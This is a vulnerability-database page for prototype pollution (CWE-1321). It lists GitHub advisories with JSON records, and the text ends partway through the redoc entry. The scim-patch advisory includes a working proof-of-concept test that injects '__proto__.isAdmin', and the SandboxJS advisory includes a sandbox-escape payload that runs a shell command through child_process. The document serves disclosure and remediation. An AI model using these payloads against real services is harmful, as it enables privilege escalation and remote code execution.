CWE-1321
AllowedImproperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution')
Abstraction: Variant · Status: Incomplete
The product receives input from an upstream component that specifies attributes that are to be initialized or updated in an object, but it does not properly control modifications of attributes of the object prototype.
783 vulnerabilities reference this CWE, most recent first.
GHSA-9M6G-WC8R-Q59C
Vulnerability from github – Published: 2026-06-22 22:57 – Updated: 2026-06-22 22:57Summary
scim-patch performs prototype pollution when applying a SCIM PATCH operation whose value object contains a key like "__proto__.someProp". After one such patch,
Object.prototype.someProp is set process-wide, affecting every plain object in the Node process.
Any service that calls scimPatch() on attacker-controlled JSON (i.e. any SCIM endpoint accepting PATCH from an external IdP) is exploitable on a stock Node runtime.
Impact
- Class: Prototype pollution (CWE-1321)
- Affected versions:
<= 0.9.0(current HEAD871b1e2) - Attack vector: Network — sent as part of a normal SCIM
PATCH /Users/:idrequest body. - Privileges required: Whatever the SCIM endpoint requires. For most integrations that's a provisioned IdP, which is "low" in CVSS terms (any authenticated provisioning client).
- Scope: Changed — the bug is in a SCIM library but the side effect (
Object.prototypemutation) leaks into the entire Node process.
Downstream consequences depend on what other code reads from plain objects. Realistic outcomes observed in similar bugs:
- Privilege escalation if any auth/middleware code checks actor.isAdmin / req.user.admin / similar boolean flags against a plain object that expects the key to be absent.
- Logic bypass / DoS if any code branches on obj.name, obj.type, obj.id etc. against plain objects (e.g. pg's prepared-statement naming check — a real incident at one consumer).
- Persistence: lasts until the Node process restarts, so the blast radius is every request that container handles after the pollution.
Root cause
In src/scimPatch.ts:415-427, addOrReplaceObjectAttribute iterates the user-supplied patch.value with Object.entries and feeds each key to resolvePaths, which splits on .:
function addOrReplaceObjectAttribute(property: any, patch: ScimPatchAddReplaceOperation, multiValuedPathFilter?: boolean): any {
if (typeof patch.value !== 'object') { ... }
// src/scimPatch.ts:423-427
for (const [key, value] of Object.entries(patch.value)) {
assign(property, resolvePaths(key), value, patch.op);
}
return property;
}
assign then walks the resulting key path with no filtering on dangerous keys (src/scimPatch.ts:437-445):
function assign(obj: any, keyPath: Array<string>, value: any, op: string) {
const lastKeyIndex = keyPath.length - 1;
for (let i = 0; i < lastKeyIndex; ++i) {
const key = keyPath[i];
if (!(key in obj)) {
obj[key] = {};
}
obj = obj[key]; // ← obj["__proto__"] === Object.prototype
}
// ... assigns into Object.prototype
}
For keyPath = ["__proto__", "polluted"]:
- "__proto__" in obj is always true, so the fresh-object branch is skipped.
- obj = obj["__proto__"] now points to Object.prototype.
- The final write lands on Object.prototype.polluted.
The same shape works for constructor.prototype keys.
Proof of concept
Drop this in test/prototypePollution.test.ts and run npm run build && npx mocha lib/test/prototypePollution.test.js. Both tests pass against HEAD 871b1e2:
import { scimPatch } from '../src/scimPatch';
import { ScimUser } from './types/types.test';
import { expect } from 'chai';
describe('Prototype pollution via scim-patch', () => {
let scimUser: ScimUser;
beforeEach(() => {
scimUser = JSON.parse(`{
"schemas": ["urn:ietf:params:scim:schemas:core:2.0:User"],
"id": "tea_4",
"userName": "spiderman",
"name": { "familyName": "Parker", "givenName": "Peter" },
"active": true,
"emails": [{ "value": "spiderman@superheroes.com", "primary": true }],
"roles": [],
"meta": { "resourceType": "User", "created": "x", "lastModified": "x", "location": "x" }
}`);
});
afterEach(() => {
delete (Object.prototype as any).polluted;
delete (Object.prototype as any).isAdmin;
});
it('pollutes Object.prototype via a value-key containing __proto__', () => {
expect(({} as any).polluted).to.equal(undefined);
scimPatch(scimUser, [{
op: 'add',
path: 'name',
value: { '__proto__.polluted': 'yes' }
}]);
expect((Object.prototype as any).polluted).to.equal('yes');
expect(({} as any).polluted).to.equal('yes');
});
it('elevates Object.prototype.isAdmin — the admin-escalation shape', () => {
expect(({} as any).isAdmin).to.equal(undefined);
scimPatch(scimUser, [{
op: 'add',
path: 'name',
value: { '__proto__.isAdmin': true }
}]);
expect((Object.prototype as any).isAdmin).to.equal(true);
expect(({} as any).isAdmin).to.equal(true);
});
});
Suggested fix
Reject the three dangerous keys in assign() before the walk. Minimal patch:
const DANGEROUS_KEYS = new Set(['__proto__', 'constructor', 'prototype']);
function assign(obj: any, keyPath: Array<string>, value: any, op: string) {
for (const key of keyPath) {
if (DANGEROUS_KEYS.has(key)) {
throw new InvalidScimPatchOp(`Forbidden key in patch path: ${key}`);
}
}
// ... existing logic
}
Alternative, slightly safer: switch the walk target to Object.create(null) nodes when creating intermediate objects, and use Object.defineProperty(obj, key, { value, enumerable: true, configurable: true, writable: true }) instead of obj[key] = value for the final write. That defends against future prototype-walking sinks even if a key sneaks past the denylist.
Either approach is a non-breaking change — legitimate SCIM clients never send these keys.
Mitigation for consumers who can't upgrade immediately
Calling Object.freeze(Object.prototype) (and the same on Array.prototype, Function.prototype) at process startup neutralizes this class of bug — assignment to a frozen prototype becomes a silent no-op in sloppy mode or a TypeError in strict mode. Node's --frozen-intrinsics flag does this for built-ins automatically.
Credit
Discovered by Lee Wang (Notion). Reported by David Wu (Notion).
Report authored by Claude. Reviewed by David Wu.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 0.9.0"
},
"package": {
"ecosystem": "npm",
"name": "scim-patch"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.9.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-48170"
],
"database_specific": {
"cwe_ids": [
"CWE-1321"
],
"github_reviewed": true,
"github_reviewed_at": "2026-06-22T22:57:48Z",
"nvd_published_at": null,
"severity": "CRITICAL"
},
"details": "## Summary\n\n`scim-patch` performs prototype pollution when applying a SCIM PATCH operation whose `value` object contains a key like `\"__proto__.someProp\"`. After one such patch,\n`Object.prototype.someProp` is set process-wide, affecting every plain object in the Node process.\n\nAny service that calls `scimPatch()` on attacker-controlled JSON (i.e. any SCIM endpoint accepting `PATCH` from an external IdP) is exploitable on a stock Node runtime.\n\n## Impact\n\n- **Class:** Prototype pollution ([CWE-1321](https://cwe.mitre.org/data/definitions/1321.html))\n- **Affected versions:** `\u003c= 0.9.0` (current HEAD `871b1e2`)\n- **Attack vector:** Network \u2014 sent as part of a normal SCIM `PATCH /Users/:id` request body.\n- **Privileges required:** Whatever the SCIM endpoint requires. For most integrations that\u0027s a provisioned IdP, which is \"low\" in CVSS terms (any authenticated provisioning client).\n- **Scope:** Changed \u2014 the bug is in a SCIM library but the side effect (`Object.prototype` mutation) leaks into the entire Node process.\n\nDownstream consequences depend on what other code reads from plain objects. Realistic outcomes observed in similar bugs:\n- **Privilege escalation** if any auth/middleware code checks `actor.isAdmin` / `req.user.admin` / similar boolean flags against a plain object that *expects* the key to be absent.\n- **Logic bypass / DoS** if any code branches on `obj.name`, `obj.type`, `obj.id` etc. against plain objects (e.g. `pg`\u0027s prepared-statement naming check \u2014 a real incident at one consumer).\n- **Persistence:** lasts until the Node process restarts, so the blast radius is *every* request that container handles after the pollution.\n\n## Root cause\n\nIn `src/scimPatch.ts:415-427`, `addOrReplaceObjectAttribute` iterates the user-supplied `patch.value` with `Object.entries` and feeds each key to `resolvePaths`, which splits on `.`:\n\n```ts\nfunction addOrReplaceObjectAttribute(property: any, patch: ScimPatchAddReplaceOperation, multiValuedPathFilter?: boolean): any {\n if (typeof patch.value !== \u0027object\u0027) { ... }\n\n // src/scimPatch.ts:423-427\n for (const [key, value] of Object.entries(patch.value)) {\n assign(property, resolvePaths(key), value, patch.op);\n }\n return property;\n}\n```\n\n`assign` then walks the resulting key path with no filtering on dangerous keys (`src/scimPatch.ts:437-445`):\n\n```ts\nfunction assign(obj: any, keyPath: Array\u003cstring\u003e, value: any, op: string) {\n const lastKeyIndex = keyPath.length - 1;\n for (let i = 0; i \u003c lastKeyIndex; ++i) {\n const key = keyPath[i];\n if (!(key in obj)) {\n obj[key] = {};\n }\n obj = obj[key]; // \u2190 obj[\"__proto__\"] === Object.prototype\n }\n // ... assigns into Object.prototype\n}\n```\n\nFor `keyPath = [\"__proto__\", \"polluted\"]`:\n- `\"__proto__\" in obj` is always true, so the fresh-object branch is skipped.\n- `obj = obj[\"__proto__\"]` now points to `Object.prototype`.\n- The final write lands on `Object.prototype.polluted`.\n\nThe same shape works for `constructor.prototype` keys.\n\n## Proof of concept\n\nDrop this in `test/prototypePollution.test.ts` and run `npm run build \u0026\u0026 npx mocha lib/test/prototypePollution.test.js`. Both tests pass against HEAD `871b1e2`:\n\n```ts\nimport { scimPatch } from \u0027../src/scimPatch\u0027;\nimport { ScimUser } from \u0027./types/types.test\u0027;\nimport { expect } from \u0027chai\u0027;\n\ndescribe(\u0027Prototype pollution via scim-patch\u0027, () =\u003e {\n let scimUser: ScimUser;\n\n beforeEach(() =\u003e {\n scimUser = JSON.parse(`{\n \"schemas\": [\"urn:ietf:params:scim:schemas:core:2.0:User\"],\n \"id\": \"tea_4\",\n \"userName\": \"spiderman\",\n \"name\": { \"familyName\": \"Parker\", \"givenName\": \"Peter\" },\n \"active\": true,\n \"emails\": [{ \"value\": \"spiderman@superheroes.com\", \"primary\": true }],\n \"roles\": [],\n \"meta\": { \"resourceType\": \"User\", \"created\": \"x\", \"lastModified\": \"x\", \"location\": \"x\" }\n }`);\n });\n\n afterEach(() =\u003e {\n delete (Object.prototype as any).polluted;\n delete (Object.prototype as any).isAdmin;\n });\n\n it(\u0027pollutes Object.prototype via a value-key containing __proto__\u0027, () =\u003e {\n expect(({} as any).polluted).to.equal(undefined);\n\n scimPatch(scimUser, [{\n op: \u0027add\u0027,\n path: \u0027name\u0027,\n value: { \u0027__proto__.polluted\u0027: \u0027yes\u0027 }\n }]);\n\n expect((Object.prototype as any).polluted).to.equal(\u0027yes\u0027);\n expect(({} as any).polluted).to.equal(\u0027yes\u0027);\n });\n\n it(\u0027elevates Object.prototype.isAdmin \u2014 the admin-escalation shape\u0027, () =\u003e {\n expect(({} as any).isAdmin).to.equal(undefined);\n\n scimPatch(scimUser, [{\n op: \u0027add\u0027,\n path: \u0027name\u0027,\n value: { \u0027__proto__.isAdmin\u0027: true }\n }]);\n\n expect((Object.prototype as any).isAdmin).to.equal(true);\n expect(({} as any).isAdmin).to.equal(true);\n });\n});\n```\n\n## Suggested fix\n\nReject the three dangerous keys in `assign()` before the walk. Minimal patch:\n\n```ts\nconst DANGEROUS_KEYS = new Set([\u0027__proto__\u0027, \u0027constructor\u0027, \u0027prototype\u0027]);\n\nfunction assign(obj: any, keyPath: Array\u003cstring\u003e, value: any, op: string) {\n for (const key of keyPath) {\n if (DANGEROUS_KEYS.has(key)) {\n throw new InvalidScimPatchOp(`Forbidden key in patch path: ${key}`);\n }\n }\n // ... existing logic\n}\n```\n\nAlternative, slightly safer: switch the walk target to `Object.create(null)` nodes when creating intermediate objects, and use `Object.defineProperty(obj, key, { value, enumerable: true, configurable: true, writable: true })` instead of `obj[key] = value` for the final write. That defends against future prototype-walking sinks even if a key sneaks past the denylist.\n\nEither approach is a non-breaking change \u2014 legitimate SCIM clients never send these keys.\n\n## Mitigation for consumers who can\u0027t upgrade immediately\n\nCalling `Object.freeze(Object.prototype)` (and the same on `Array.prototype`, `Function.prototype`) at process startup neutralizes this class of bug \u2014 assignment to a frozen prototype becomes a silent no-op in sloppy mode or a `TypeError` in strict mode. Node\u0027s `--frozen-intrinsics` flag does this for built-ins automatically.\n\n## Credit\n\nDiscovered by **Lee Wang (Notion)**. Reported by **David Wu (Notion)**.\n\nReport authored by **Claude**. Reviewed by **David Wu**.",
"id": "GHSA-9m6g-wc8r-q59c",
"modified": "2026-06-22T22:57:48Z",
"published": "2026-06-22T22:57:48Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/thomaspoignant/scim-patch/security/advisories/GHSA-9m6g-wc8r-q59c"
},
{
"type": "WEB",
"url": "https://github.com/thomaspoignant/scim-patch/commit/260f9cd2ac5ceac3976978850bb47dcb391720f6"
},
{
"type": "PACKAGE",
"url": "https://github.com/thomaspoignant/scim-patch"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:H/A:L",
"type": "CVSS_V3"
}
],
"summary": "scimPatch vulnerable to prototype pollution via unfiltered keys in patch"
}
GHSA-9M93-W8W6-76HH
Vulnerability from github – Published: 2023-07-17 03:30 – Updated: 2023-07-18 16:57Prototype Pollution in GitHub repository automattic/mongoose prior to 7.3.3, 6.11.3, and 5.13.20.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "mongoose"
},
"ranges": [
{
"events": [
{
"introduced": "7.0.0"
},
{
"fixed": "7.3.3"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "mongoose"
},
"ranges": [
{
"events": [
{
"introduced": "6.0.0"
},
{
"fixed": "6.11.3"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "mongoose"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "5.13.20"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2023-3696"
],
"database_specific": {
"cwe_ids": [
"CWE-1321"
],
"github_reviewed": true,
"github_reviewed_at": "2023-07-18T16:57:08Z",
"nvd_published_at": "2023-07-17T01:15:08Z",
"severity": "CRITICAL"
},
"details": "Prototype Pollution in GitHub repository automattic/mongoose prior to 7.3.3, 6.11.3, and 5.13.20.",
"id": "GHSA-9m93-w8w6-76hh",
"modified": "2023-07-18T16:57:08Z",
"published": "2023-07-17T03:30:20Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-3696"
},
{
"type": "WEB",
"url": "https://github.com/Automattic/mongoose/commit/e29578d2ec18a68aeb4717d66dd5eb66bae53de1"
},
{
"type": "WEB",
"url": "https://github.com/Automattic/mongoose/commit/f1efabf350522257364aa5c2cb36e441cf08f1a2"
},
{
"type": "WEB",
"url": "https://github.com/automattic/mongoose/commit/305ce4ff789261df7e3f6e72363d0703e025f80d"
},
{
"type": "PACKAGE",
"url": "https://github.com/Automattic/mongoose"
},
{
"type": "WEB",
"url": "https://github.com/Automattic/mongoose/releases/tag/7.3.3"
},
{
"type": "WEB",
"url": "https://huntr.dev/bounties/1eef5a72-f6ab-4f61-b31d-fc66f5b4b467"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "Mongoose Prototype Pollution vulnerability"
}
GHSA-9MX2-PRFP-8HQP
Vulnerability from github – Published: 2021-05-10 18:38 – Updated: 2021-04-21 20:37This affects the package simpl-schema before 1.10.2. Attacker controlled input into a schema could result in remote code execution within the scope of the surrounding application.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "simpl-schema"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.10.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2020-7742"
],
"database_specific": {
"cwe_ids": [
"CWE-1321"
],
"github_reviewed": true,
"github_reviewed_at": "2021-04-21T20:37:29Z",
"nvd_published_at": "2020-10-07T09:15:00Z",
"severity": "HIGH"
},
"details": "This affects the package simpl-schema before 1.10.2. Attacker controlled input into a schema could result in remote code execution within the scope of the surrounding application.",
"id": "GHSA-9mx2-prfp-8hqp",
"modified": "2021-04-21T20:37:29Z",
"published": "2021-05-10T18:38:47Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-7742"
},
{
"type": "WEB",
"url": "https://github.com/longshotlabs/simpl-schema/commit/50128841fa7fc2d137c36a397054279144caea3d"
},
{
"type": "WEB",
"url": "https://github.com/longshotlabs/simpl-schema/releases/tag/1.10.2"
},
{
"type": "WEB",
"url": "https://snyk.io/vuln/SNYK-JS-SIMPLSCHEMA-1016157"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "Prototype Pollution in simpl-schema"
}
GHSA-9P4G-CJCF-Q3X2
Vulnerability from github – Published: 2022-03-17 00:00 – Updated: 2022-03-23 00:00The jQuery deserialize library in Fisheye and Crucible before version 4.8.9 allowed remote attackers to to inject arbitrary HTML and/or JavaScript via a prototype pollution vulnerability.
{
"affected": [],
"aliases": [
"CVE-2021-43956"
],
"database_specific": {
"cwe_ids": [
"CWE-1321"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2022-03-16T01:15:00Z",
"severity": "MODERATE"
},
"details": "The jQuery deserialize library in Fisheye and Crucible before version 4.8.9 allowed remote attackers to to inject arbitrary HTML and/or JavaScript via a prototype pollution vulnerability.",
"id": "GHSA-9p4g-cjcf-q3x2",
"modified": "2022-03-23T00:00:35Z",
"published": "2022-03-17T00:00:51Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-43956"
},
{
"type": "WEB",
"url": "https://jira.atlassian.com/browse/CRUC-8531"
},
{
"type": "WEB",
"url": "https://jira.atlassian.com/browse/FE-7395"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-9P4W-FQ8M-2HP7
Vulnerability from github – Published: 2026-02-02 20:17 – Updated: 2026-02-03 16:13Summary
SandboxJS does not properly restrict __lookupGetter__ which can be used to obtain prototypes, which can be used for escaping the sandbox / remote code execution.
Details
https://github.com/nyariv/SandboxJS/blob/f212a38fb5a6d4bc2bc2e2466c0c011ce8d41072/src/executor.ts#L368-L398
The Object prototype which contains __lookupGetter__ is properly protected, but the special case for accessing function properties bypasses the prototype chain checks including the root Object prototype.
PoC
const s = require("@nyariv/sandboxjs").default;
const sb = new s();
payload = `
let getProto = Object.toString.__lookupGetter__("__proto__")
let m = getProto.call(new Map());
m.has = isFinite;
console.log(
isFinite.constructor(
"return process.getBuiltinModule('child_process').execSync('ls -lah').toString()",
)(),
);`
sb.compile(payload)().run();
Impact
Prototype Pollution -> RCE
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 0.8.26"
},
"package": {
"ecosystem": "npm",
"name": "@nyariv/sandboxjs"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.8.27"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-25142"
],
"database_specific": {
"cwe_ids": [
"CWE-1321",
"CWE-94"
],
"github_reviewed": true,
"github_reviewed_at": "2026-02-02T20:17:39Z",
"nvd_published_at": "2026-02-02T23:16:09Z",
"severity": "CRITICAL"
},
"details": "### Summary\n\nSandboxJS does not properly restrict `__lookupGetter__` which can be used to obtain prototypes, which can be used for escaping the sandbox / remote code execution.\n\n### Details\n\nhttps://github.com/nyariv/SandboxJS/blob/f212a38fb5a6d4bc2bc2e2466c0c011ce8d41072/src/executor.ts#L368-L398\n\nThe Object prototype which contains `__lookupGetter__` is properly protected, but the special case for accessing function properties bypasses the prototype chain checks including the root Object prototype.\n\n### PoC\n```js\nconst s = require(\"@nyariv/sandboxjs\").default;\nconst sb = new s();\n\npayload = `\nlet getProto = Object.toString.__lookupGetter__(\"__proto__\")\nlet m = getProto.call(new Map());\nm.has = isFinite;\n\nconsole.log(\n isFinite.constructor(\n \"return process.getBuiltinModule(\u0027child_process\u0027).execSync(\u0027ls -lah\u0027).toString()\",\n )(),\n);`\nsb.compile(payload)().run();\n```\n\n### Impact\nPrototype Pollution -\u003e RCE",
"id": "GHSA-9p4w-fq8m-2hp7",
"modified": "2026-02-03T16:13:28Z",
"published": "2026-02-02T20:17:39Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/nyariv/SandboxJS/security/advisories/GHSA-9p4w-fq8m-2hp7"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25142"
},
{
"type": "WEB",
"url": "https://github.com/nyariv/SandboxJS/commit/75c8009db32e6829b0ad92ca13bf458178442bd3"
},
{
"type": "PACKAGE",
"url": "https://github.com/nyariv/SandboxJS"
},
{
"type": "WEB",
"url": "https://github.com/nyariv/SandboxJS/blob/f212a38fb5a6d4bc2bc2e2466c0c011ce8d41072/src/executor.ts#L368-L398"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "SandboxJS Vulnerable to Prototype Pollution -\u003e Sandbox Escape -\u003e RCE"
}
GHSA-9PGH-QQPF-7WQJ
Vulnerability from github – Published: 2022-10-11 20:42 – Updated: 2022-11-08 19:35Withdrawn
This advisory has been withdrawn because the maintainers of @xmldom/xmldom and multiple third parties disputed the validity of the issue. Attempts to create or replicate a proof of concept have been unsuccessful.
Original Description
Impact
A prototype pollution vulnerability exists in the function copy in dom.js in the xmldom (published as @xmldom/xmldom) package.
Patches
Update to @xmldom/xmldom@~0.7.6, @xmldom/xmldom@~0.8.3 (dist-tag latest) or @xmldom/xmldom@>=0.9.0-beta.2 (dist-tag next).
Workarounds
None
References
https://github.com/xmldom/xmldom/pull/437
For more information
If you have any questions or comments about this advisory: * Email us at security@xmldom.org * Add information to https://github.com/xmldom/xmldom/issues/436
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "@xmldom/xmldom"
},
"ranges": [
{
"events": [
{
"introduced": "0.8.0"
},
{
"fixed": "0.8.3"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "xmldom"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "0.6.0"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "@xmldom/xmldom"
},
"ranges": [
{
"events": [
{
"introduced": "0.9.0-beta.1"
},
{
"fixed": "0.9.0-beta.2"
}
],
"type": "ECOSYSTEM"
}
],
"versions": [
"0.9.0-beta.1"
]
},
{
"package": {
"ecosystem": "npm",
"name": "@xmldom/xmldom"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.7.6"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2022-37616"
],
"database_specific": {
"cwe_ids": [
"CWE-1321"
],
"github_reviewed": true,
"github_reviewed_at": "2022-10-11T20:42:57Z",
"nvd_published_at": "2022-10-11T05:15:00Z",
"severity": "CRITICAL"
},
"details": "## Withdrawn\n\nThis advisory has been withdrawn because the maintainers of `@xmldom/xmldom` and multiple third parties disputed the validity of the issue. Attempts to create or replicate a proof of concept have been unsuccessful.\n\n## Original Description\n\n### Impact\nA prototype pollution vulnerability exists in the function copy in dom.js in the xmldom (published as @xmldom/xmldom) package.\n\n### Patches\nUpdate to `@xmldom/xmldom@~0.7.6`, `@xmldom/xmldom@~0.8.3` (dist-tag `latest`) or `@xmldom/xmldom@\u003e=0.9.0-beta.2` (dist-tag `next`).\n\n### Workarounds\nNone\n\n### References\nhttps://github.com/xmldom/xmldom/pull/437\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Email us at security@xmldom.org\n* Add information to https://github.com/xmldom/xmldom/issues/436\n",
"id": "GHSA-9pgh-qqpf-7wqj",
"modified": "2022-11-08T19:35:06Z",
"published": "2022-10-11T20:42:57Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/xmldom/xmldom/security/advisories/GHSA-9pgh-qqpf-7wqj"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-37616"
},
{
"type": "WEB",
"url": "https://github.com/xmldom/xmldom/issues/436"
},
{
"type": "WEB",
"url": "https://github.com/xmldom/xmldom/issues/436#issuecomment-1319412826"
},
{
"type": "WEB",
"url": "https://github.com/xmldom/xmldom/issues/436#issuecomment-1327776560"
},
{
"type": "WEB",
"url": "https://github.com/xmldom/xmldom/pull/437"
},
{
"type": "WEB",
"url": "https://dl.acm.org/doi/abs/10.1145/3488932.3497769"
},
{
"type": "WEB",
"url": "https://dl.acm.org/doi/pdf/10.1145/3488932.3497769"
},
{
"type": "PACKAGE",
"url": "https://github.com/xmldom/xmldom"
},
{
"type": "WEB",
"url": "https://github.com/xmldom/xmldom/blob/bc36efddf9948aba15618f85dc1addfc2ac9d7b2/lib/dom.js#L1"
},
{
"type": "WEB",
"url": "https://github.com/xmldom/xmldom/blob/bc36efddf9948aba15618f85dc1addfc2ac9d7b2/lib/dom.js#L3"
},
{
"type": "WEB",
"url": "https://github.com/xmldom/xmldom/blob/master/CHANGELOG.md#076"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2022/10/msg00023.html"
},
{
"type": "WEB",
"url": "http://users.encs.concordia.ca/~mmannan/publications/JS-vulnerability-aisaccs2022.pdf"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Withdrawn: Improperly Controlled Modification of Object Prototype Attributes (\u0027Prototype Pollution\u0027) in @xmldom/xmldom and xmldom",
"withdrawn": "2022-11-08T19:35:06Z"
}
GHSA-9QM3-6QRR-C76M
Vulnerability from github – Published: 2025-07-31 15:35 – Updated: 2025-07-31 19:28A prototype pollution vulnerability exists in @nyariv/sandboxjs versions <= 0.8.23, allowing attackers to inject arbitrary properties into Object.prototype via crafted JavaScript code. This can result in a denial-of-service (DoS) condition or, under certain conditions, escape the sandboxed environment intended to restrict code execution. The vulnerability stems from insufficient prototype access checks in the sandbox’s executor logic, particularly in the handling of JavaScript function objects returned.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "@nyariv/sandboxjs"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.8.24"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-34146"
],
"database_specific": {
"cwe_ids": [
"CWE-1321"
],
"github_reviewed": true,
"github_reviewed_at": "2025-07-31T19:28:27Z",
"nvd_published_at": "2025-07-31T15:15:36Z",
"severity": "HIGH"
},
"details": "A prototype pollution vulnerability exists in @nyariv/sandboxjs versions \u003c= 0.8.23, allowing attackers to inject arbitrary properties into Object.prototype via crafted JavaScript code. This can result in a denial-of-service (DoS) condition or, under certain conditions, escape the sandboxed environment intended to restrict code execution. The vulnerability stems from insufficient prototype access checks in the sandbox\u2019s executor logic, particularly in the handling of JavaScript function objects returned.",
"id": "GHSA-9qm3-6qrr-c76m",
"modified": "2025-07-31T19:28:27Z",
"published": "2025-07-31T15:35:50Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-34146"
},
{
"type": "WEB",
"url": "https://github.com/nyariv/SandboxJS/issues/31"
},
{
"type": "WEB",
"url": "https://gist.github.com/Hagrid29/9df27829a491080f923c4f6b8518d7e3"
},
{
"type": "PACKAGE",
"url": "https://github.com/nyariv/SandboxJS"
},
{
"type": "WEB",
"url": "https://www.npmjs.com/package/@nyariv/sandboxjs"
},
{
"type": "WEB",
"url": "https://www.vulncheck.com/advisories/nyariv-sandboxjs-prototype-pollution-sandbox-escape-dos"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "@nyariv/sandboxjs has Prototype Pollution vulnerability that may lead to RCE"
}
GHSA-9QRG-H9G8-C65Q
Vulnerability from github – Published: 2020-09-04 15:14 – Updated: 2020-08-31 18:55All versions of deep-setter are vulnerable to prototype pollution. The package does not restrict the modification of an Object's prototype, which may allow an attacker to add or modify an existing property that will exist on all objects.
Recommendation
No fix is currently available. Consider using an alternative package until a fix is made available.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "deep-setter"
},
"ranges": [
{
"events": [
{
"introduced": "0.0.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-1321"
],
"github_reviewed": true,
"github_reviewed_at": "2020-08-31T18:55:28Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "All versions of `deep-setter` are vulnerable to prototype pollution. The package does not restrict the modification of an Object\u0027s prototype, which may allow an attacker to add or modify an existing property that will exist on all objects.\n\n\n\n\n## Recommendation\n\nNo fix is currently available. Consider using an alternative package until a fix is made available.",
"id": "GHSA-9qrg-h9g8-c65q",
"modified": "2020-08-31T18:55:28Z",
"published": "2020-09-04T15:14:26Z",
"references": [
{
"type": "WEB",
"url": "https://www.npmjs.com/advisories/1333"
}
],
"schema_version": "1.4.0",
"severity": [],
"summary": "Prototype Pollution in deep-setter"
}
GHSA-9RHG-254W-FH9X
Vulnerability from github – Published: 2025-03-28 21:30 – Updated: 2025-03-31 15:58A prototype pollution in the component Module.mergeObjects (redoc/bundles/redoc.lib.js:2) of redoc <= 2.2.0 allows attackers to cause a Denial of Service (DoS) via supplying a crafted payload.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "redoc"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.4.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2024-57083"
],
"database_specific": {
"cwe_ids": [
"CWE-1321"
],
"github_reviewed": true,
"github_reviewed_at": "2025-03-31T15:58:51Z",
"nvd_published_at": "2025-03-28T21:15:17Z",
"severity": "HIGH"
},
